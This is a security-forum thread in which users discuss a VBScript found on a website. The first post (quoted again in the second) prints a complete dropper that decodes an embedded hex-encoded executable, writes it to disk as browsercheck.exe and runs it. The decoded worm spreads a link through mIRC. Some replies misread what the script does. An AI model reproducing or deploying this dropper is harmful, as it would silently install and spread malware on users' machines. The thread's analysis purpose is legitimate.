Results 1 to 7 of 7

Thread: New Virus

  1. #1
    Senior Member Falcon21's Avatar
    Join Date
    Dec 2002
    Location
    Singapore
    Posts
    252

    New Virus

    From the virus-infected website http://www.kromberg.at/[removed]/show.php?
    f=drunkchicks.jpg :

    <script language=vbs>
    self.MoveTo 5000,5000
    dim v(23)
    v(0)="4d,5a,90,y,03,y3,04,y3,z2,y2,b8,y7,40,y23,c8,y3,0e,1f,ba,0e,y,b4,09,cd,21,b8,01,4c,cd,21,54,68,69,73,20,70,72,6f,67,72,61,6d,20,63,61,6e2,6f,74,20,62,65,20,72,75,6e,20,69,6e,20,44"
    v(1)=",4f,53,20,6d,6f,64,65,2e,0d2,0a,24,y7,37,de,56,d8,73,bf,38,8b,73,bf,38,8b,73,bf,38,8b,2c,9d,33,8b,70,bf,38,8b,73,bf,39,8b,62,bf,38,8b,11,a0,2b,8b,76,bf,38,8b,75,9c,33,8b,71,bf,38,8b"
    v(2)=",52,69,63,68,73,bf,38,8b,y10,50,45,y2,4c,01,03,y,53,94,75,3f,y8,e0,y,0f,01,0b,01,06,y2,04,y3,06,y6,54,11,y3,10,y3,20,y4,40,y2,10,y3,02,y2,04,y7,04,y8,40,y3,04,y2,54,fe,y2,02,y5,10"
    v(3)=",y2,10,y4,10,y2,10,y6,10,yb,48,20,y2,3c,y54,20,y2,48,y1b,2e,74,65,78,74,y3,4d,02,y3,10,y3,04,y3,04,ye,20,y2,60,2e,72,64,61,74,61,y2,10,02,y3,20,y3,04,y3,08,ye,40,y2,40,2e,64,61,74,61"
    v(4)=",y3,0c,01,y3,30,y3,02,y3,0c,ye,40,y2,c0,y1c8,55,8b,ec,83,ec,30,53,56,57,6a,08,59,33,c0,8d,7d,d4,33,f6,f3,ab,56,68,y,c0,18,y,8d,45,fc,bf,ec,03,y2,56,50,c7,45,d0,24,y3,89,7d,dc,89,75"
    v(5)=",fc,e8,17,01,y2,39,75,fc,0f,84,cf,y3,57,68,f8,30,40,y,z,75,fc,e8,fa,y3,3b,c6,89,45,f8,75,03,56,eb,63,57,68,f0,30,40,y,z,75,fc,e8,e2,y3,8b,d8,3b,de,74,4c,ba,08,30,40,y,83,c9,z"
    v(6)=",8b,fa,33,c0,f2,ae,6a,01,6a,01,53,56,f7,d1,51,52,z,75,fc,e8,b6,y3,8b,f8,3b,fe,74,1d,8d,45,d0,50,53,z,75,f8,z,75,fc,e8,9a,y3,3b,c6,89,45,f4,75,1c,57,e8,87,y3,53,z,75,fc,e8,78,y3"
    v(7)=",z,75,f8,z,75,fc,e8,6d,y3,eb,4a,56,6a,64,68,90,40,y2,6a,01,53,50,6a,z,57,e8,51,y3,z,75,f4,e8,43,y3,57,e8,4f,y3,53,z,75,fc,e8,40,y3,z,75,f8,z,75,fc,e8,35,y3,6a,02,562,z,75,fc"
    v(8)=",e8,17,y3,z,75,fc,e8,09,y3,5f,5e,33,c0,5b,c9,c2,10,y,z,25,3c,20,40,y,z,25,2c,20,40,y,z,25,34,20,40,y,z,25,30,20,40,y,z,25,1c,20,40,y,z,25,28,20,40,y,z,25,24,20,40,y"
    v(9)=",z,25,202,40,y,z,25,38,20,40,y,z,25,40,20,40,y,55,8b,ec,83,ec,44,56,z,15,04,20,40,y,8b,f0,8a,06,3c,22,75,14,3c,22,74,08,8a,46,01,46,84,c0,75,f4,80,3e,22,75,0d,46,eb,0a,3c,20"
    v(10)=",7e,06,46,80,3e,20,7f,fa,8a,06,84,c0,74,04,3c,20,7e,e9,83,65,e8,y,8d,45,bc,50,z,15,08,20,40,y,e8,5b,y3,68,04,30,40,y,68,y,30,40,y,e8,32,y3,f6,45,e8,01,592,74,06,0f,b7,45,ec,eb"
    v(11)=",03,6a,0a,58,50,56,6a,y,6a,y,z,15,14,20,40,y,50,e8,2a,fe,z2,8b,f0,e8,3a,y3,56,z,15,0c,20,40,y,5e,56,8b,74,24,08,3b,74,24,0c,73,0d,8b,06,85,c0,74,02,z,d0,83,c6,04,eb,ed,5e,c3"
    v(12)=",6a,20,58,6a,04,50,a3,04,31,40,y,e8,24,y3,59,a3,y,31,40,y,59,c3,8b,0d,08,31,40,y,85,c9,74,11,a1,y,31,40,y,8d,0c,88,51,50,e8,b5,z3,592,c3,8b,44,24,04,0f,af,44,24,08,50,6a,08,z"
    v(13)=",15,y,20,40,y,50,z,15,10,20,40,y,c3,y1b3,f0,21,y2,d2,21,y2,c0,21,y2,9e,21,y2,e4,21,y2,ac,21,y6,18,21,y2,50,21,y2,42,21,y2,2e,21,y2,de,20,y3,21,y2,f0,20,y2,66,21,y2,cc,20,y2,80,21"
    v(14)=",y6,a0,20,ya,92,21,y2,1c,20,y2,84,20,ya,02,22,y3,20,y16,f0,21,y2,d2,21,y2,c0,21,y2,9e,21,y2,e4,21,y2,ac,21,y6,18,21,y2,50,21,y2,42,21,y2,2e,21,y2,de,20,y3,21,y2,f0,20,y2,66,21,y2,cc"
    v(15)=",20,y2,80,21,y6,7d,y,44,64,65,55,6e,69,6e,69,74,69,61,6c,69,7a,65,y,73,y,44,64,65,4e,61,6d,65,53,65,72,76,69,63,65,y2,67,y,44,64,65,44,69,73,63,6f,6e2,65,63,74,y,60,y,44,64,65"
    v(16)=",43,6c,69,65,6e,74,54,72,61,6e,73,61,63,74,69,6f,6e,y2,6b,y,44,64,65,46,72,652,53,74,72,69,6e,67,48,61,6e,64,6c,65,y,6a,y,44,64,65,46,72,652,44,61,74,61,48,61,6e,64,6c,65,y,62,y"
    v(17)=",44,64,65,43,6f,6e2,65,63,74,y2,64,y,44,64,65,43,72,65,61,74,65,44,61,74,61,48,61,6e,64,6c,65,y,65,y,44,64,65,43,72,65,61,74,65,53,74,72,69,6e,67,48,61,6e,64,6c,65,41,y2,70,y,44"
    v(18)=",64,65,49,6e,69,74,69,61,6c,69,7a,65,41,y2,55,53,45,52,33,32,2e,64,6c2,y2,7d,y,45,78,69,74,50,72,6f,63,65,732,y,26,01,47,65,74,4d,6f,64,75,6c,65,48,61,6e,64,6c,65,41,y2,50,01,47,65"
    v(19)=",74,53,74,61,72,74,75,70,49,6e,66,6f,41,y,ca,y,47,65,74,43,6f,6d2,61,6e,64,4c,69,6e,65,41,y,99,01,48,65,61,70,41,6c2,6f,63,y,40,01,47,65,74,50,72,6f,63,65,732,48,65,61,70,y2,4b,45"
    v(20)=",52,4e,45,4c,33,32,2e,64,6c2,y1fa,2f,61,6d,73,67,20,68,742,70,3a,2f2,773,2e,6b,72,6f,6d,62,65,72,67,2e,61,74,2f,70,69,63,73,2f,73,68,6f,77,2e,70,68,70,3f,66,3d,64,72,75,6e,6b,63,68,69,63"
    v(21)=",6b,73,2e,6a,70,67,20,4c,4f,4c,20,7c,20,2f2,74,6f,70,69,63,20,24,63,68,61,6e,28,31,29,20,68,742,70,3a,2f2,773,2e,6b,72,6f,6d,62,65,72,67,2e,61,74,2f,70,69,63,73,2f,73,68,6f,77,2e,70,68"
    v(22)=",70,3f,66,3d,64,72,75,6e,6b,63,68,69,63,6b,73,2e,6a,70,67,20,7c,20,2f2,74,6f,70,69,63,20,24,63,68,61,6e,28,32,29,20,68,742,70,3a,2f2,773,2e,6b,72,6f,6d,62,65,72,67,2e,61,74,2f,70,69,63"
    v(23)=",73,2f,73,68,6f,77,2e,70,68,70,3f,66,3d,64,72,75,6e,6b,63,68,69,63,6b,73,2e,6a,70,67,20,7c,20,2f2,6d,6f,64,65,20,24,6d,65,20,2b,72,y4,43,4f,4d2,41,4e,44,y,6d,49,52,43,y104"

    function res(x,y)
    For k = 0 To UBound(v)
    v(k) = Replace(v(k), x, y)
    Next
    End Function
    res "z", "ff"
    res "y", "00"
    For m = 0 To UBound(v)
    it = it & v(m)
    Next
    tmp = Split(it, ",")
    Set WshShell = CreateObject("WScript.Shell")
    Set WshEnv = WshShell.Environment("Process")
    pth = WshEnv("HOMEDRIVE") & WshEnv("HOMEPATH") & "\browsercheck.exe"
    pth = "C:\browsercheck.exe"

    Set fso = CreateObject("Scripting.FileSystemObject")

    Set f = fso.CreateTextFile(pth, True)
    For i = 0 To UBound(tmp)
    l = Len(tmp(i))
    b = Int("&H" & Left(tmp(i), 2))
    If l > 2 Then
    r = Int("&H" & Mid(tmp(i), 3, l-2))
    For j = 1 To r
    f.Write Chr(b)
    Next
    Else
    f.Write Chr(b)
    End If
    Next
    f.Close
    WshShell.run("""" & pth & """")

    </script>

  2. #2
    Senior Member
    Join Date
    Sep 2003
    Posts
    279
    self.MoveTo 5000,5000
    dim v(23)
    v(0)=" 4d,5a,90,y,03,y3,04,y3,z2,y2,b8,y7,40,y23,c8,y3,0e
    ,1f,ba,0e,y,b4,09,cd,21,b8,01,4c,cd,21,54,68,69,73
    ,20,70,72,6f,67,72,61,6d,20,63,61,6e2,6f,74,20,62,
    65,20,72,75,6e,20,69,6e,20,44"
    v(1)=" ,4f,53,20,6d,6f,64,65,2e,0d2,0a,24,y7,37,de,56,d8,
    73,bf,38,8b,73,bf,38,8b,73,bf,38,8b,2c,9d,33,8b,70
    ,bf,38,8b,73,bf,39,8b,62,bf,38,8b,11,a0,2b,8b,76,b
    f,38,8b,75,9c,33,8b,71,bf,38,8b"
    v(2)=" ,52,69,63,68,73,bf,38,8b,y10,50,45,y2,4c,01,03,y,5
    3,94,75,3f,y8,e0,y,0f,01,0b,01,06,y2,04,y3,06,y6,5
    4,11,y3,10,y3,20,y4,40,y2,10,y3,02,y2,04,y7,04,y8,
    40,y3,04,y2,54,fe,y2,02,y5,10"
    v(3)=" ,y2,10,y4,10,y2,10,y6,10,yb,48,20,y2,3c,y54,20,y2,
    48,y1b,2e,74,65,78,74,y3,4d,02,y3,10,y3,04,y3,04,y
    e,20,y2,60,2e,72,64,61,74,61,y2,10,02,y3,20,y3,04,
    y3,08,ye,40,y2,40,2e,64,61,74,61"
    v(4)=" ,y3,0c,01,y3,30,y3,02,y3,0c,ye,40,y2,c0,y1c8,55,8b
    ,ec,83,ec,30,53,56,57,6a,08,59,33,c0,8d,7d,d4,33,f
    6,f3,ab,56,68,y,c0,18,y,8d,45,fc,bf,ec,03,y2,56,50
    ,c7,45,d0,24,y3,89,7d,dc,89,75"
    v(5)=" ,fc,e8,17,01,y2,39,75,fc,0f,84,cf,y3,57,68,f8,30,4
    0,y,z,75,fc,e8,fa,y3,3b,c6,89,45,f8,75,03,56,eb,63
    ,57,68,f0,30,40,y,z,75,fc,e8,e2,y3,8b,d8,3b,de,74,
    4c,ba,08,30,40,y,83,c9,z"
    v(6)=" ,8b,fa,33,c0,f2,ae,6a,01,6a,01,53,56,f7,d1,51,52,z
    ,75,fc,e8,b6,y3,8b,f8,3b,fe,74,1d,8d,45,d0,50,53,z
    ,75,f8,z,75,fc,e8,9a,y3,3b,c6,89,45,f4,75,1c,57,e8
    ,87,y3,53,z,75,fc,e8,78,y3"
    v(7)=" ,z,75,f8,z,75,fc,e8,6d,y3,eb,4a,56,6a,64,68,90,40,
    y2,6a,01,53,50,6a,z,57,e8,51,y3,z,75,f4,e8,43,y3,5
    7,e8,4f,y3,53,z,75,fc,e8,40,y3,z,75,f8,z,75,fc,e8,
    35,y3,6a,02,562,z,75,fc"
    v(8)=" ,e8,17,y3,z,75,fc,e8,09,y3,5f,5e,33,c0,5b,c9,c2,10
    ,y,z,25,3c,20,40,y,z,25,2c,20,40,y,z,25,34,20,40,y
    ,z,25,30,20,40,y,z,25,1c,20,40,y,z,25,28,20,40,y,z
    ,25,24,20,40,y"
    v(9)=" ,z,25,202,40,y,z,25,38,20,40,y,z,25,40,20,40,y,55,
    8b,ec,83,ec,44,56,z,15,04,20,40,y,8b,f0,8a,06,3c,2
    2,75,14,3c,22,74,08,8a,46,01,46,84,c0,75,f4,80,3e,
    22,75,0d,46,eb,0a,3c,20"
    v(10)=" ,7e,06,46,80,3e,20,7f,fa,8a,06,84,c0,74,04,3c,20,7
    e,e9,83,65,e8,y,8d,45,bc,50,z,15,08,20,40,y,e8,5b,
    y3,68,04,30,40,y,68,y,30,40,y,e8,32,y3,f6,45,e8,01
    ,592,74,06,0f,b7,45,ec,eb"
    v(11)=" ,03,6a,0a,58,50,56,6a,y,6a,y,z,15,14,20,40,y,50,e8
    ,2a,fe,z2,8b,f0,e8,3a,y3,56,z,15,0c,20,40,y,5e,56,
    8b,74,24,08,3b,74,24,0c,73,0d,8b,06,85,c0,74,02,z,
    d0,83,c6,04,eb,ed,5e,c3"
    v(12)=" ,6a,20,58,6a,04,50,a3,04,31,40,y,e8,24,y3,59,a3,y,
    31,40,y,59,c3,8b,0d,08,31,40,y,85,c9,74,11,a1,y,31
    ,40,y,8d,0c,88,51,50,e8,b5,z3,592,c3,8b,44,24,04,0
    f,af,44,24,08,50,6a,08,z"
    v(13)=" ,15,y,20,40,y,50,z,15,10,20,40,y,c3,y1b3,f0,21,y2,
    d2,21,y2,c0,21,y2,9e,21,y2,e4,21,y2,ac,21,y6,18,21
    ,y2,50,21,y2,42,21,y2,2e,21,y2,de,20,y3,21,y2,f0,2
    0,y2,66,21,y2,cc,20,y2,80,21"
    v(14)=" ,y6,a0,20,ya,92,21,y2,1c,20,y2,84,20,ya,02,22,y3,2
    0,y16,f0,21,y2,d2,21,y2,c0,21,y2,9e,21,y2,e4,21,y2
    ,ac,21,y6,18,21,y2,50,21,y2,42,21,y2,2e,21,y2,de,2
    0,y3,21,y2,f0,20,y2,66,21,y2,cc"
    v(15)=" ,20,y2,80,21,y6,7d,y,44,64,65,55,6e,69,6e,69,74,69
    ,61,6c,69,7a,65,y,73,y,44,64,65,4e,61,6d,65,53,65,
    72,76,69,63,65,y2,67,y,44,64,65,44,69,73,63,6f,6e2
    ,65,63,74,y,60,y,44,64,65"
    v(16)=" ,43,6c,69,65,6e,74,54,72,61,6e,73,61,63,74,69,6f,6
    e,y2,6b,y,44,64,65,46,72,652,53,74,72,69,6e,67,48,
    61,6e,64,6c,65,y,6a,y,44,64,65,46,72,652,44,61,74,
    61,48,61,6e,64,6c,65,y,62,y"
    v(17)=" ,44,64,65,43,6f,6e2,65,63,74,y2,64,y,44,64,65,43,7
    2,65,61,74,65,44,61,74,61,48,61,6e,64,6c,65,y,65,y
    ,44,64,65,43,72,65,61,74,65,53,74,72,69,6e,67,48,6
    1,6e,64,6c,65,41,y2,70,y,44"
    v(18)=" ,64,65,49,6e,69,74,69,61,6c,69,7a,65,41,y2,55,53,4
    5,52,33,32,2e,64,6c2,y2,7d,y,45,78,69,74,50,72,6f,
    63,65,732,y,26,01,47,65,74,4d,6f,64,75,6c,65,48,61
    ,6e,64,6c,65,41,y2,50,01,47,65"
    v(19)=" ,74,53,74,61,72,74,75,70,49,6e,66,6f,41,y,ca,y,47,
    65,74,43,6f,6d2,61,6e,64,4c,69,6e,65,41,y,99,01,48
    ,65,61,70,41,6c2,6f,63,y,40,01,47,65,74,50,72,6f,6
    3,65,732,48,65,61,70,y2,4b,45"
    v(20)=" ,52,4e,45,4c,33,32,2e,64,6c2,y1fa,2f,61,6d,73,67,2
    0,68,742,70,3a,2f2,773,2e,6b,72,6f,6d,62,65,72,67,
    2e,61,74,2f,70,69,63,73,2f,73,68,6f,77,2e,70,68,70
    ,3f,66,3d,64,72,75,6e,6b,63,68,69,63"
    v(21)=" ,6b,73,2e,6a,70,67,20,4c,4f,4c,20,7c,20,2f2,74,6f,
    70,69,63,20,24,63,68,61,6e,28,31,29,20,68,742,70,3
    a,2f2,773,2e,6b,72,6f,6d,62,65,72,67,2e,61,74,2f,7
    0,69,63,73,2f,73,68,6f,77,2e,70,68"
    v(22)=" ,70,3f,66,3d,64,72,75,6e,6b,63,68,69,63,6b,73,2e,6
    a,70,67,20,7c,20,2f2,74,6f,70,69,63,20,24,63,68,61
    ,6e,28,32,29,20,68,742,70,3a,2f2,773,2e,6b,72,6f,6
    d,62,65,72,67,2e,61,74,2f,70,69,63"
    v(23)=" ,73,2f,73,68,6f,77,2e,70,68,70,3f,66,3d,64,72,75,6
    e,6b,63,68,69,63,6b,73,2e,6a,70,67,20,7c,20,2f2,6d
    ,6f,64,65,20,24,6d,65,20,2b,72,y4,43,4f,4d2,41,4e,
    44,y,6d,49,52,43,y104"
    What Language Is That? HEX?
    AntiOnline Quick Forum Version 2b Click Here
    10010101000000110010001100111

  3. #3
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,188
    Hi falcon,

    Looks like VB6, compressed?

    Sorry..............not a lot of help there

    Cheers

  4. #4
    Senior Member
    Join Date
    Sep 2003
    Posts
    279
    I see how that Works... It takes the big string(Source Code of a file) at the the top puts it all in a variable. Creates a shell of a file called browsercheck.exe and injects the code into it. I've never seend a source code like that before. I'm thinking that its hex. I don't think it can be binary.
    AntiOnline Quick Forum Version 2b Click Here
    10010101000000110010001100111

  5. #5
    Well, it is a combination of binary and some variables: ysomething, zsomething. Tried to do some deconstruction to see if there is a pattern or anything meaningful. No luck.

    But, yeah, it looks a VB Script that injects something into the browser to replace favorites or default home pages.

    If this was found on a specific web site, it might be a good idea to block that domain and/or IP as a self-preservation action.

  6. #6
    Senior Member
    Join Date
    Sep 2003
    Posts
    156
    see what happens when you look at pr0n




    t.e.k.n.o.

  7. #7
    Senior Member Falcon21's Avatar
    Join Date
    Dec 2002
    Location
    Singapore
    Posts
    252
    Thanks for all the replies, I have already found the info: http://www.f-secure.com/v-descs/kromber.shtml

    This is a harmless mIRC worm. The virus website have already been taken down.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •